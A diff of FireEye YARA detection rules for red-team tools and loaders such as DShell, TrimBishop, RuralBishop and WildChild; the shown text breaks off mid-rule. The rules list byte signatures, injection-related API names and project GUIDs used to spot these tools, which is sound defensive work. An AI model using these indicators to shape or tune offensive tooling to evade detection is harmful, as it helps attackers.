-		$s1 = "GF6eU5ldFRvSnNjcmlwdExvYWRl"
-		$s2 = "henlOZXRUb0pzY3JpcHRMb2Fk"
-		$s3 = "YXp5TmV0VG9Kc2NyaXB0TG9hZGV"
+		$sb1 = { 6A 40 68 00 30 00 00 [4-32] E8 [4-8] 50 [0-16] E8 [4-150] 6A FF [1-32] 6A 00 6A 00 5? 6A 00 6A 00 [0-32] E8 [4] 50 }
+		$ss1 = "\x00CreateThread\x00"
+		$ss2 = "base64.d" fullword
+		$ss3 = "core.sys.windows" fullword
 
 	condition:
-		any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
 }
-rule FIREEYE_RT_Builder_MSIL_G2JS_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win32_Dshell_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the Gadget2JScript project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "484202c2-ac7d-5e6c-8bf1-3452a357c668"
-		date = "2020-12-09"
+		id = "dad763bd-0e4a-542a-9920-ece11d23ce24"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/G2JS/production/yara/Builder_MSIL_G2JS_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/production/yara/APT_Loader_Win32_DShell_1.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "fa255fdc88ab656ad9bc383f9b322a76"
-		logic_hash = "487d8e8deef218412f241d99ce32b63bfeb3568d23048b9dd4afff8f401bfea5"
+		hash = "12c3566761495b8353f67298f15b882c"
+		logic_hash = "79643f9c252765647d80f6fe1ee7bb698fbc6a6c3a0ff1fd819a09bff031907c"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 2
+		rev = 1
 
 	strings:
-		$typelibguid1 = "AF9C62A1-F8D2-4BE0-B019-0A7873E81EA9" ascii nocase wide
+		$sb1 = { 6A 40 68 00 30 00 00 [4-32] E8 [4-8] 50 [0-16] E8 [4-150] 6A FF [1-32] 6A 00 6A 00 5? 6A 00 6A 00 [0-32] E8 [4] 50 }
+		$sb2 = { FF 7? 0C B? [4-16] FF 7? 08 5? [0-12] E8 [4] 84 C0 74 05 B? 01 00 00 00 [0-16] 80 F2 01 0F 84 }
+		$ss1 = "\x00CreateThread\x00"
+		$ss2 = "base64.d" fullword
+		$ss3 = "core.sys.windows" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
 }
-rule FIREEYE_RT_Loader_MSIL_Wildchild_1 : FILE
+rule FIREEYE_RT_APT_Backdoor_Win_Dshell_2 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the WildChild project."
+		description = "This rule looks for strings specific to the D programming language in combination with a selection of Windows functions that are present within a DShell payload"
 		author = "FireEye"
-		id = "350dd658-46c9-573b-b532-07e4b437ba8d"
+		id = "538e150f-0fb9-5a85-9299-9b4a57f8a606"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WILDCHILD/production/yara/Loader_MSIL_WildChild_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/supplemental/yara/APT_Backdoor_Win_DShell_2.yar#L4-L132"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "7e6bc0ed11c2532b2ae7060327457812"
-		logic_hash = "e4320e33770613542182518ec787e4ccbb32f83c8afca5ec957d4846e6f4eb04"
-		score = 75
-		quality = 73
+		hash = "e0683f8ee787313cfd2c61cd0995a830"
+		logic_hash = "2b4d33c17cac35153346002c48457d9b46010f1c052df632c647c22c8d96b54c"
+		score = 60
+		quality = 20
 		tags = "FILE"
 		rev = 4
 
 	strings:
-		$typelibguid1 = "2e71d5ff-ece4-4006-9e98-37bb724a7780" ascii nocase wide
+		$dlang1 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\utf.d" ascii wide
+		$dlang2 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\file.d" ascii wide
+		$dlang3 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\format.d" ascii wide
+		$dlang4 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\base64.d" ascii wide
+		$dlang5 = "C:\\D\\dmd2\\windows\\bin\\..\\..\\src\\phobos\\std\\stdio.d" ascii wide
+		$dlang6 = "\\..\\..\\src\\phobos\\std\\utf.d" ascii wide
+		$dlang7 = "\\..\\..\\src\\phobos\\std\\file.d" ascii wide
+		$dlang8 = "\\..\\..\\src\\phobos\\std\\format.d" ascii wide
+		$dlang9 = "\\..\\..\\src\\phobos\\std\\base64.d" ascii wide
+		$dlang10 = "\\..\\..\\src\\phobos\\std\\stdio.d" ascii wide
+		$dlang11 = "Unexpected '\\n' when converting from type const(char)[] to type int" ascii wide
+		$ign1 = "--strip-comments"
+		$ign2 = "Usage: rdmd [RDMD AND DMD OPTIONS]"
+		$s1 = "CloseHandle"
+		$s2 = "CommandLineToArgvW"
+		$s3 = "CreateFileA"
+		$s4 = "CreateSemaphoreA"
+		$s5 = "CreateThread"
+		$s6 = "DeleteCriticalSection"
+		$s7 = "DeleteFileA"
+		$s8 = "DuplicateHandle"
+		$s9 = "EnterCriticalSection"
+		$s10 = "ExitProcess"
+		$s11 = "ExitThread"
+		$s12 = "ExpandEnvironmentStringsW"
+		$s13 = "FileTimeToDosDateTime"
+		$s14 = "FindClose"
+		$s15 = "FindFirstFileA"
+		$s16 = "FindFirstFileW"
+		$s17 = "FindNextFileA"
+		$s18 = "FindNextFileW"
+		$s19 = "FormatMessageW"
+		$s20 = "FreeEnvironmentStringsA"
+		$s21 = "FreeEnvironmentStringsW"
+		$s22 = "FreeLibrary"
+		$s23 = "GetACP"
+		$s24 = "GetCPInfo"
+		$s25 = "GetCommandLineA"
+		$s26 = "GetCommandLineW"
+		$s27 = "GetConsoleOutputCP"
+		$s28 = "GetConsoleScreenBufferInfo"
+		$s29 = "GetCurrentProcess"
+		$s30 = "GetCurrentThread"
+		$s31 = "GetCurrentThreadId"
+		$s32 = "GetEnvironmentStrings"
+		$s33 = "GetEnvironmentStringsW"
+		$s34 = "GetEnvironmentVariableA"
+		$s35 = "GetEnvironmentVariableW"
+		$s36 = "GetExitCodeThread"
+		$s37 = "GetFileAttributesW"
+		$s38 = "GetFileType"
+		$s39 = "GetLastError"
+		$s40 = "GetModuleFileNameA"
+		$s41 = "GetModuleHandleA"
+		$s42 = "GetOEMCP"
+		$s43 = "GetProcAddress"
+		$s44 = "GetProcessHeap"
+		$s45 = "GetStdHandle"
+		$s46 = "GetStringTypeA"
+		$s47 = "GetSystemInfo"
+		$s48 = "GetThreadContext"
+		$s49 = "GetTickCount"
+		$s50 = "GetTimeZoneInformation"
+		$s51 = "GetVersion"
+		$s52 = "GlobalAlloc"
+		$s53 = "GlobalFree"
+		$s54 = "GlobalMemoryStatus"
+		$s55 = "HeapAlloc"
+		$s56 = "HeapFree"
+		$s57 = "HeapReAlloc"
+		$s58 = "InitializeCriticalSection"
+		$s59 = "IsDebuggerPresent"
+		$s60 = "LCMapStringA"
+		$s61 = "LeaveCriticalSection"
+		$s62 = "LoadLibraryA"
+		$s63 = "LoadLibraryW"
+		$s64 = "LocalFree"
+		$s65 = "MessageBoxA"
+		$s66 = "MultiByteToWideChar"
+		$s67 = "QueryPerformanceCounter"
+		$s68 = "QueryPerformanceFrequency"
+		$s69 = "RaiseException"
+		$s70 = "ReadFile"
+		$s71 = "RegCloseKey"
+		$s72 = "RegCreateKeyExW"
+		$s73 = "RegDeleteKeyW"
+		$s74 = "RegDeleteValueW"
+		$s75 = "RegEnumKeyExW"
+		$s76 = "RegEnumValueW"
+		$s77 = "RegFlushKey"
+		$s78 = "RegOpenKeyExW"
+		$s79 = "RegOpenKeyW"
+		$s80 = "RegQueryInfoKeyW"
+		$s81 = "RegQueryValueExW"
+		$s82 = "RegSetValueExW"
+		$s83 = "ReleaseSemaphore"
+		$s84 = "ResumeThread"
+		$s85 = "RtlCaptureContext"
+		$s86 = "RtlUnwind"
+		$s87 = "SetConsoleCtrlHandler"
+		$s88 = "SetEnvironmentVariableW"
+		$s89 = "SetFilePointer"
+		$s90 = "SetHandleCount"
+		$s91 = "SetLastError"
+		$s92 = "Sleep"
+		$s93 = "SuspendThread"
+		$s94 = "SwitchToThread"
+		$s95 = "SystemTimeToTzSpecificLocalTime"
+		$s96 = "TryEnterCriticalSection"
+		$s97 = "TzSpecificLocalTimeToSystemTime"
+		$s98 = "UnhandledExceptionFilter"
+		$s99 = "VirtualAlloc"
+		$s100 = "VirtualFree"
+		$s101 = "WaitForSingleObject"
+		$s102 = "WideCharToMultiByte"
+		$s103 = "WriteConsoleA"
+		$s104 = "WriteFile"
+		$s105 = "lstrlenW"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and filesize > 500KB and filesize > 700KB and all of ( $s* ) and 1 of ( $dlang* ) and not $ign1 and not $ign2
 }
-rule FIREEYE_RT_Dropper_HTA_Wildchild_1 : FILE
+rule FIREEYE_RT_Loader_MSIL_Ruralbishop_3 : FILE
 {
 	meta:
-		description = "This rule looks for strings present in unobfuscated HTAs generated by the WildChild builder."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public RuralBishop project."
 		author = "FireEye"
-		id = "f570baa5-7d58-5a0a-b713-769e62076f76"
+		id = "55a060ef-74e2-50d9-9090-558aaa04d97d"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WILDCHILD/production/yara/Dropper_HTA_WildChild_1.yar#L4-L24"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/Loader_MSIL_RuralBishop_3.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "3e61ca5057633459e96897f79970a46d"
-		logic_hash = "60c1d53b8a43b9b7518f3260a4d61c6806641ee894a2a331a3a0a2ea0aff9d99"
+		hash = "09bdbad8358b04994e2c04bb26a160ef"
+		logic_hash = "a4c55dede432c249e36e96ca09555448b0343969d389bfdb4bd459fe34e05ea1"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 5
+		rev = 3
 
 	strings:
-		$s1 = "processpath" ascii wide
-		$s2 = "v4.0.30319" ascii wide
-		$s3 = "v2.0.50727" ascii wide
-		$s4 = "COMPLUS_Version" ascii wide
-		$s5 = "FromBase64Transform" ascii wide
-		$s6 = "MemoryStream" ascii wide
-		$s7 = "entry_class" ascii wide
-		$s8 = "DynamicInvoke" ascii wide
-		$s9 = "Sendoff" ascii wide
-		$script_header = "<script language=" ascii wide
+		$typelibguid1 = "FE4414D9-1D7E-4EEB-B781-D278FE7A5619" ascii nocase wide
 
 	condition:
-		$script_header at 0 and all of ( $s* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_APT_Loader_MSIL_WILDCHILD_1 : FILE
+rule FIREEYE_RT_APT_Loader_MSIL_TRIMBISHOP_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "b9e0707e-98eb-55da-ad1d-6a84bd113747"
-		date = "2020-12-01"
-		date = "2020-12-01"
+		id = "1a3f4247-25f4-51ca-b881-209c0753b915"
+		date = "2020-12-03"
+		date = "2020-12-03"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WILDCHILD/production/yara/APT_Loader_MSIL_WILDCHILD_1.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/APT_Loader_MSIL_TRIMBISHOP_1.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "6f04a93753ae3ae043203437832363c4"
-		logic_hash = "a600c3d127f77dc1f99160e4a242e005970de0abd1798296b6a351b968ca1350"
+		hash = "e91670423930cbbd3dbf5eac1f1a7cb6"
+		logic_hash = "f020efff58c8b7761d700c662c422a9e1ffdf8fe5f6648e421b7c257e3b8d078"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$s1 = "\x00QueueUserAPC\x00"
-		$s2 = "\x00WriteProcessMemory\x00"
-		$sb1 = { 6F [2] 00 0A 28 [2] 00 0A 6F [2] 00 0A 13 ?? 28 [2] 00 0A 28 [2] 00 0A 13 ?? 11 ?? 11 ?? 28 [2] 00 0A [0-16] 7B [2] 00 04 1? 20 [4] 28 [2] 00 0A 11 ?? 28 [2] 00 0A 28 [2] 00 0A 7E [2] 00 0A 7E [2] 00 0A 28 [2] 00 06 [0-16] 14 7E [2] 00 0A 7E [2] 00 0A 1? 20 04 00 08 08 7E [2] 00 0A 14 12 ?? 12 ?? 28 [2] 00 06 [0-16] 7B [2] 00 04 7E [2] 00 0A [0-16] 8E ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 06 [4-120] 28 [2] 00 06 [0-80] 6F [2] 00 0A 6F [2] 00 0A 28 [2] 00 06 13 ?? 11 ?? 11 ?? 7E [2] 00 0A 28 [2] 00 06 }
+		$sb1 = { 28 [2] 00 06 0A 06 7B [2] 00 04 [12-64] 06 7B [2] 00 04 6E 28 [2] 00 06 0B 07 7B [2] 00 04 [12-64] 0? 7B [2] 00 04 0? 7B [2] 00 04 0? 7B [2] 00 04 6E 28 [2] 00 06 0? 0? 7B [2] 00 04 [12-80] 0? 7B [2] 00 04 1? 0? 7B [2] 00 04 }
+		$sb2 = { 0F ?? 7C [2] 00 04 28 [2] 00 0A 8C [2] 00 01 [20-80] 28 [2] 00 06 0? 0? 7E [2] 00 0A 28 [2] 00 0A [12-80] 7E [2] 00 0A 13 ?? 0? 7B [2] 00 04 28 [2] 00 0A 0? 28 [2] 00 0A 58 28 [2] 00 0A 13 [1-32] 28 [2] 00 0A [0-32] D0 [2] 00 02 28 [2] 00 0A 28 [2] 00 0A 74 [2] 00 02 }
+		$ss1 = "\x00NtMapViewOfSection\x00"
+		$ss2 = "\x00NtOpenProcess\x00"
+		$ss3 = "\x00NtAlertResumeThread\x00"
+		$ss4 = "\x00LdrGetProcedureAddress\x00"
+		$tb1 = "\x00DTrim.Execution.DynamicInvoke\x00"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( @sb1 [ 1 ] < @sb2 [ 1 ] ) and ( all of ( $ss* ) ) and ( all of ( $tb* ) )
 }
-rule FIREEYE_RT_Hacktool_MSIL_Keefarce_1 : FILE
+rule FIREEYE_RT_Loader_MSIL_Trimbishop_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'KeeFarce' project."
+		description = "This rule looks for .NET PE files that have the string 'msg' more than 60 times as well as numerous function names unique to or used by the TrimBishop tool. All strings found in RuralBishop are reversed in TrimBishop and stored in a variable with the format 'msg##'. With the exception of 'msg', 'DTrim', and 'ReverseString' the other strings referenced in this rule may be shared with RuralBishop."
 		author = "FireEye"
-		id = "c17add0c-e09f-5ced-a4e1-bf60afad4725"
+		id = "4d58f0a2-bf16-584c-8e92-c8ef54427767"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/KEEFARCE/production/yara/HackTool_MSIL_KeeFarce_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/Loader_MSIL_TrimBishop_1.yar#L4-L26"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "8db86230849137608880dbe448737fc70068d308772e294cc69301b18ae10908"
+		hash = "09bdbad8358b04994e2c04bb26a160ef"
+		logic_hash = "018e87542301db22c384fda2709e8d49711c0fa041d1ef591f98ee7a70dbb677"
 		score = 75
-		quality = 73
+		quality = 50
 		tags = "FILE"
 		rev = 3
 
 	strings:
-		$typelibguid0 = "17589ea6-fcc9-44bb-92ad-d5b3eea6af03" ascii nocase wide
+		$msg = "msg" ascii wide
+		$msil = "_CorExeMain" ascii wide
+		$str1 = "RuralBishop" ascii wide
+		$str2 = "KnightKingside" ascii wide
+		$str3 = "ReadShellcode" ascii wide
+		$str4 = "ReverseString" ascii wide
+		$str5 = "DTrim" ascii wide
+		$str6 = "QueensGambit" ascii wide
+		$str7 = "Messages" ascii wide
+		$str8 = "NtQueueApcThread" ascii wide
+		$str9 = "NtAlertResumeThread" ascii wide
+		$str10 = "NtQueryInformationThread" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and #msg > 60 and all of ( $str* )
 }
-rule FIREEYE_RT_Hacktool_MSIL_SEATBELT_2 : FILE
+rule FIREEYE_RT_APT_Loader_MSIL_TRIMBISHOP_2 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SeatBelt project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "225b42fe-c73a-59c0-a1f4-1d6dff6e76e1"
-		date = "2020-12-09"
+		id = "90ee2569-2e68-517b-b2d7-8c4015d92683"
+		date = "2020-12-03"
+		date = "2020-12-03"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BELTALOWDA/production/yara/HackTool_MSIL_SEATBELT_2.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/APT_Loader_MSIL_TRIMBISHOP_2.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "9f401176a9dd18fa2b5b90b4a2aa1356"
-		logic_hash = "e48474c5025fd88e3c2824e1e943ff56cde0ea05984aad0249ccf73caa6d4a36"
+		hash = "c0598321d4ad4cf1219cc4f84bad4094"
+		logic_hash = "4cccfca0c06954105f762066741b6c35599a6c28df8b7c255a2659059169578f"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$typelibguid1 = "AEC32155-D589-4150-8FE7-2900DF4554C8" ascii nocase wide
+		$ss1 = "\x00NtMapViewOfSection\x00"
+		$ss2 = "\x00NtOpenProcess\x00"
+		$ss3 = "\x00NtAlertResumeThread\x00"
+		$ss4 = "\x00LdrGetProcedureAddress\x00"
+		$ss5 = "\x2f(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00i\x00|\x00I\x00n\x00j\x00e\x00c\x00t\x00)\x00$\x00"
+		$ss6 = "\x2d(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00c\x00|\x00C\x00l\x00e\x00a\x00n\x00)\x00$\x00"
+		$tb1 = "\x00DTrim.Execution.DynamicInvoke\x00"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_SEATBELT_1 : FILE
+rule FIREEYE_RT_Loader_MSIL_RURALBISHOP_2 : FILE
 {
 	meta:
-		description = "This rule looks for .NET PE files that have regex and format strings found in the public tool SeatBelt. Due to the nature of the regex and format strings used for detection, this rule should detect custom variants of the SeatBelt project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "46477f87-2458-5b8e-894a-9aa536a441ad"
-		date = "2020-12-09"
+		id = "3befb3f2-81d1-5db2-84d9-773158b9837c"
+		date = "2020-12-03"
+		date = "2020-12-03"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/BELTALOWDA/production/yara/HackTool_MSIL_SEATBELT_1.yar#L4-L25"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/new/yara/Loader_MSIL_RURALBISHOP_2.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "848837b83865f3854801be1f25cb9f4d"
-		logic_hash = "4248e5561ef60e725c23efc89c899d6fc8be5bf2142f700fb70daecd72c30dd8"
+		hash = "e91670423930cbbd3dbf5eac1f1a7cb6"
+		logic_hash = "0467532d643cf0200c6561b0724c884230892bf59db163c311b7d4f8acbb63d6"
 		score = 75
-		quality = 30
+		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$msil = "_CorExeMain" ascii wide
-		$str1 = "{ Process = {0}, Path = {1}, CommandLine = {2} }" ascii nocase wide
-		$str2 = "Domain=\"(.*)\",Name=\"(.*)\"" ascii nocase wide
-		$str3 = "LogonId=\"(\\d+)\"" ascii nocase wide
-		$str4 = "{0}.{1}.{2}.{3}" ascii nocase wide
-		$str5 = "^\\W*([a-z]:\\\\.+?(\\.exe|\\.dll|\\.sys))\\W*" ascii nocase wide
-		$str6 = "*[System/EventID={0}]" ascii nocase wide
-		$str7 = "*[System[TimeCreated[@SystemTime >= '{" ascii nocase wide
-		$str8 = "(http|ftp|https|file)://([\\w_-]+(?:(?:\\.[\\w_-]+)+))([\\w.,@?^=%&:/~+#-]*[\\w@?^=%&/~+#-])?" ascii nocase wide
-		$str9 = "{0}" ascii nocase wide
-		$str10 = "{0,-23}" ascii nocase wide
+		$ss1 = "\x00NtMapViewOfSection\x00"
+		$ss2 = "\x00NtOpenProcess\x00"
+		$ss3 = "\x00NtAlertResumeThread\x00"
+		$ss4 = "\x00LdrGetProcedureAddress\x00"
+		$ss5 = "\x2f(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00i\x00|\x00I\x00n\x00j\x00e\x00c\x00t\x00)\x00$\x00"
+		$ss6 = "\x2d(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00c\x00|\x00C\x00l\x00e\x00a\x00n\x00)\x00$\x00"
+		$tb1 = "\x00SharpSploit.Execution.DynamicInvoke\x00"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $msil and all of ( $str* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Loader_MSIL_Wmirunner_1 : FILE
+rule FIREEYE_RT_Loader_MSIL_RURALBISHOP_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WMIRunner' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "04c6acfc-859f-5e4a-8c59-9adf08f21657"
-		date = "2020-12-09"
+		id = "1b5f1f39-9fa2-5940-8da3-03808e4b7a5d"
+		date = "2020-12-03"
+		date = "2020-12-03"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/WMIRUNNER/production/yara/Loader_MSIL_WMIRunner_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/new/yara/Loader_MSIL_RURALBISHOP_1.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "49d21756a4f0b29909c4b0fa9f3a98dd0480f9401923032de4b3920814b85f29"
+		hash = "e91670423930cbbd3dbf5eac1f1a7cb6"
+		logic_hash = "f2244c6761639c1162a77a5e82296903c3cc21fbf46d262c779c5e4d6a2ef937"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$typelibguid0 = "6cc61995-9fd5-4649-b3cc-6f001d60ceda" ascii nocase wide
+		$sb1 = { 28 [2] 00 06 0A 06 7B [2] 00 04 [12-64] 06 7B [2] 00 04 6E 28 [2] 00 06 0B 07 7B [2] 00 04 [12-64] 0? 7B [2] 00 04 0? 7B [2] 00 04 0? 7B [2] 00 04 6E 28 [2] 00 06 0? 0? 7B [2] 00 04 [12-80] 0? 7B [2] 00 04 1? 0? 7B [2] 00 04 }
+		$sb2 = { 0F ?? 7C [2] 00 04 28 [2] 00 0A 8C [2] 00 01 [20-80] 28 [2] 00 06 0? 0? 7E [2] 00 0A 28 [2] 00 0A [12-80] 7E [2] 00 0A 13 ?? 0? 7B [2] 00 04 28 [2] 00 0A 0? 28 [2] 00 0A 58 28 [2] 00 0A 13 [1-32] 28 [2] 00 0A [0-32] D0 [2] 00 02 28 [2] 00 0A 28 [2] 00 0A 74 [2] 00 02 }
+		$ss1 = "\x00NtMapViewOfSection\x00"
+		$ss2 = "\x00NtOpenProcess\x00"
+		$ss3 = "\x00NtAlertResumeThread\x00"
+		$ss4 = "\x00LdrGetProcedureAddress\x00"
+		$tb1 = "\x00SharpSploit.Execution.DynamicInvoke\x00"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( @sb1 [ 1 ] < @sb2 [ 1 ] ) and ( all of ( $ss* ) ) and ( all of ( $tb* ) )
 }
-rule FIREEYE_RT_Loader_Win_Generic_17 : FILE
+rule FIREEYE_RT_Dropper_HTA_Wildchild_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "This rule looks for strings present in unobfuscated HTAs generated by the WildChild builder."
 		author = "FireEye"
-		id = "4e5bf741-c1e3-54af-9580-02925ba6fc6a"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "f570baa5-7d58-5a0a-b713-769e62076f76"
+		date = "2020-12-09"
